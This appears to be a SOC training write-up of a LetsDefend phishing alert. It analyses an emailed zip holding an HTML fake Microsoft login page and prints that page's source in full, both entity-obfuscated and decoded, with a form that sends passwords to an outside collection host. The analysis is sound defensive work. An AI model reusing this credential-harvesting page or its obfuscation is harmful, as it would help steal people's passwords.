# Email details
Before starting the analysis, information about the incoming email should be obtained.

-   When was it sent?
-   What is the email's SMTP address?
-   What is the sender address?
-   What is the recipient address?
-   Is the mail content suspicious?
-   Are there any attachment?

# Analysis
- Source address : bill@microsoft.com
- Destination address : ellie@letdefend.io
- Event time: April 26,2021, 11:03 P.M
- SMTP Address : 180.76.101.229
* Email contains a zip file with a long random hash?
`bd05664f01205fa90774f42468a8743a.zip`
- Device action was  `Allowed`  so the email reached the recipient.

# Logs
- No network traffic detected to `180.76.101.229`

# Attachment
- Zip file contains a `.html file`
`Ellie@letsdefend.io_63963965Application.HTML`

## Statis Analysis
```html
<HTML><HEAD><TITLE>Letsdefend.io</TITLE>
<META name=GENERATOR content="MSHTML 11.00.10570.1001"></HEAD>
<BODY text=black vLink=blue aLink=blue link=blue background=&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#100;l.&#100;&#114;&#111;pb&#111;xu&#115;&#101;&#114;c&#111;&#110;t&#101;&#110;t.c&#111;m/&#115;/k&#101;gpf&#106;8lty&#106;&#106;h24/00.png>
<DIV id=login-form>
<DIV class=box-inner align=center><BR></DIV>
<DIV class=box-inner align=center>&nbsp;</DIV>
<DIV class=box-inner align=center><BR><BR>
<TABLE style="HEIGHT: 323px; WIDTH: 452px" width=452>
<TBODY>
<TR>
<TR>
<TD style="PADDING-BOTTOM: 4px; PADDING-TOP: 2px; PADDING-LEFT: 2px; PADDING-RIGHT: 2px; webkit-border-radius: 3px; border-radius: 3px; moz-border-radius: 3px" height=24 width=428 align=center></TD>
<TR>
<TD style="BORDER-TOP: rgb(46,0,79) 2px solid; BORDER-RIGHT: rgb(46,0,79) 2px solid; BORDER-BOTTOM: rgb(46,0,79) 2px solid; PADDING-BOTTOM: 5px; PADDING-TOP: 5px; PADDING-LEFT: 5px; BORDER-LEFT: rgb(46,0,79) 2px solid; PADDING-RIGHT: 5px; webkit-border-radius: 3px; border-radius: 3px; moz-border-radius: 3px" bgColor=#ffffff height=310 width=428>
<IMG style="HEIGHT: 54px; WIDTH: 77px" alt="Partenaire : le g&Atilde;&#402;&copy;ant Microsoft - Ai3" src="&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;encrypted-tbn0.gstat&#105;c.com/&#105;mages?q=tbn%3AANd9GcSAluhajE56aexBgNLyhO8o4gfUkxvz76QA2g&amp;usqp=CAU" width=77 height=39>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <STRONG><FONT color=#2e004f size=2 face="Palatino Linotype">&#76;&#111;&shy;g&shy;&#105;&#110; &#116;&#111; co&shy;&#110;&#116;&shy;&#105;&#110;&shy;&#117;&#101;.....</FONT></STRONG><BR><BR>
<FORM id=login_form onsubmit="return hash2(this)" style="PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; LINE-HEIGHT: 1.22em; PADDING-RIGHT: 0px" method=post name=login_form action=&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#116;&#101;&#99;&#121;&#97;&#114;&#100;&#105;&#116;&#46;&#99;&#111;&#109;&#47;&#119;&#112;&#45;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#47;&#99;&#97;&#114;&#100;&#47;2&#47;&#112;&#111;&#115;&#116;&#46;&#112;&#104;&#112;>
<DIV id=layer4 style="HEIGHT: 20px; WIDTH: 314px; POSITION: absolute; LEFT: 63px; Z-INDEX: 2; TOP: 152px"><SPAN class=formwrap></SPAN></DIV>
<DIV id=layer5 style="HEIGHT: 30px; WIDTH: 92px; POSITION: absolute; LEFT: 166px; Z-INDEX: 3; TOP: 198px"></DIV>&nbsp;&nbsp;&nbsp;&#69;&shy;&#109;&#97;&shy;&#105;&#108; &#73;&shy;&#68;:&nbsp; <SPAN class=formwrap>&nbsp;<INPUT id=did class=validate[required] style="HEIGHT: 42px; WIDTH: 291px" size=291 value=ellie@letsdefend.io name=userid autocomplete="on" required=""><BR><BR></SPAN><SPAN class=formwrap>
&nbsp;&nbsp;&nbsp;	&#80;&shy;&#97;&#115;&shy;&#115;&shy;&#119;&#111;&shy;&#114;&#100;:&nbsp;&nbsp;<INPUT id=didd class=validate[required] style="HEIGHT: 41px; WIDTH: 293px" size=1 type=password name=pass placeholder="P&shy;as&shy;sw&shy;ord" required="">&nbsp;</SPAN><BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>&nbsp;
<DIV>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BUTTON tabIndex=4 id=.save class="lgbx-btn purple-bg" style="FONT-SIZE: 13px; CURSOR: pointer; BORDER-TOP: rgb(82,38,117) 1px solid; HEIGHT: 35px; BORDER-RIGHT: rgb(82,38,117) 1px solid;
WIDTH: 100px; BORDER-BOTTOM: rgb(82,38,117) 1px solid; FONT-WEIGHT: bold; COLOR: rgb(255,255,255); TEXT-ALIGN: center; BORDER-LEFT: rgb(82,38,117) 1px solid; LINE-HEIGHT: 1.22em; BACKGROUND-COLOR: rgb(5,55,155); border-top-left-radius: 2px; border-top-right-radius: 2px; border-bottom-right-radius: 2px; border-bottom-left-radius: 2px" type=submit name=.save>&#83;&#105;&shy;&#103;&#110; &#73;&#110;</BUTTON>&nbsp;</DIV></FORM></TD></TR></TBODY>
<DIV></DIV>
<DIV></DIV>
<DIV></DIV>
<DIV></DIV>
<DIV></DIV>
<DIV></DIV></DIV></DIV></BODY></HTML>
```
Some of the strings are obfuscated in HTML entities
- We can un-obfuscate it  using Cyberchef and format it better.
```html
<HTML>
   <HEAD>
      <TITLE>Letsdefend.io</TITLE>
      <META name=GENERATOR content="MSHTML 11.00.10570.1001">
   </HEAD>
   <BODY text=black vLink=blue aLink=blue link=blue background=https://dl.dropboxusercontent.com/s/kegpfj8ltyjjh24/00.png>
      <DIV id=login-form>
         <DIV class=box-inner align=center><BR></DIV>
         <DIV class=box-inner align=center> </DIV>
         <DIV class=box-inner align=center>
            <BR><BR>
            <TABLE style="HEIGHT: 323px; WIDTH: 452px" width=452>
            <TBODY>
               <TR>
               <TR>
                  <TD style="PADDING-BOTTOM: 4px; PADDING-TOP: 2px; PADDING-LEFT: 2px; PADDING-RIGHT: 2px; webkit-border-radius: 3px; border-radius: 3px; moz-border-radius: 3px" height=24 width=428 align=center></TD>
               <TR>
                  <TD style="BORDER-TOP: rgb(46,0,79) 2px solid; BORDER-RIGHT: rgb(46,0,79) 2px solid; BORDER-BOTTOM: rgb(46,0,79) 2px solid; PADDING-BOTTOM: 5px; PADDING-TOP: 5px; PADDING-LEFT: 5px; BORDER-LEFT: rgb(46,0,79) 2px solid; PADDING-RIGHT: 5px; webkit-border-radius: 3px; border-radius: 3px; moz-border-radius: 3px" bgColor=#ffffff height=310 width=428>
                     <IMG style="HEIGHT: 54px; WIDTH: 77px" alt="Partenaire : le gÃƒ©ant Microsoft - Ai3" src="https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcSAluhajE56aexBgNLyhO8o4gfUkxvz76QA2g&usqp=CAU" width=77 height=39>        <STRONG><FONT color=#2e004f size=2 face="Palatino Linotype">Lo­g­in to co­nt­in­ue.....</FONT></STRONG><BR><BR>
                     <FORM id=login_form onsubmit="return hash2(this)" style="PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; LINE-HEIGHT: 1.22em; PADDING-RIGHT: 0px" method=post name=login_form action=https://tecyardit.com/wp-content/card/2/post.php>
                        <DIV id=layer4 style="HEIGHT: 20px; WIDTH: 314px; POSITION: absolute; LEFT: 63px; Z-INDEX: 2; TOP: 152px"><SPAN class=formwrap></SPAN></DIV>
                        <DIV id=layer5 style="HEIGHT: 30px; WIDTH: 92px; POSITION: absolute; LEFT: 166px; Z-INDEX: 3; TOP: 198px"></DIV>
                        E­ma­il I­D:  <SPAN class=formwrap> <INPUT id=did class=validate[required] style="HEIGHT: 42px; WIDTH: 291px" size=291 value=ellie@letsdefend.io name=userid autocomplete="on" required=""><BR><BR></SPAN><SPAN class=formwrap>
                        P­as­s­wo­rd:  <INPUT id=didd class=validate[required] style="HEIGHT: 41px; WIDTH: 293px" size=1 type=password name=pass placeholder="P­as­sw­ord" required=""> </SPAN><BR>       <BR> 
                        <DIV>
                           <BUTTON tabIndex=4 id=.save class="lgbx-btn purple-bg" style="FONT-SIZE: 13px; CURSOR: pointer; BORDER-TOP: rgb(82,38,117) 1px solid; HEIGHT: 35px; BORDER-RIGHT: rgb(82,38,117) 1px solid;
                              WIDTH: 100px; BORDER-BOTTOM: rgb(82,38,117) 1px solid; FONT-WEIGHT: bold; COLOR: rgb(255,255,255); TEXT-ALIGN: center; BORDER-LEFT: rgb(82,38,117) 1px solid; LINE-HEIGHT: 1.22em; BACKGROUND-COLOR: rgb(5,55,155); border-top-left-radius: 2px; border-top-right-radius: 2px; border-bottom-right-radius: 2px; border-bottom-left-radius: 2px" type=submit name=.save>Si­gn In</BUTTON> 
                        </DIV>
                     </FORM>
                  </TD>
               </TR>
            </TBODY>
            <DIV></DIV>
            <DIV></DIV>
            <DIV></DIV>
            <DIV></DIV>
            <DIV></DIV>
            <DIV></DIV>
         </DIV>
      </DIV>
   </BODY>
</HTML>
```
- List of end-points :
```txt
1. https://dl.dropboxusercontent.com/s/kegpfj8ltyjjh24/00.png
2. https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcSAluhajE56aexBgNLyhO8o4gfUkxvz76QA2g&usqp=CAU
3. https://tecyardit.com/wp-content/card/2/post.php
```
- The first endpoint is just setting a picture of an EXCEL spreadsheet as the background of the page.
- The second endpoint is also showing `Content-Type` of images. Checking it out, it was a picture of Microsoft logo.
- The third endpoint is not resolving anymore. Checking it out on VirusTotal, 7 security vendors flagged it as malicious for phishing.

## Dynamic Analysis
![[soc-143-page.png]]

- Judging by the page, it look like it was harvesting targeted credentials of Exchange users. Since we know that the background is only a picture and this is a HTML file. This is a phishing attempt. 
- From the source code, we know that the credentials will be posted to `https://tecyardit.com/wp-content/card/2/post.php`
- Since it already pre-set the Email-ID, we can say that this was a target phishing attempt.

# Conclusion
- We can conclude that this was a phishing attempt sent through email to try to impersonate Microsoft to steal passwords and credentials. Since emails are usually public this is not a IOC.

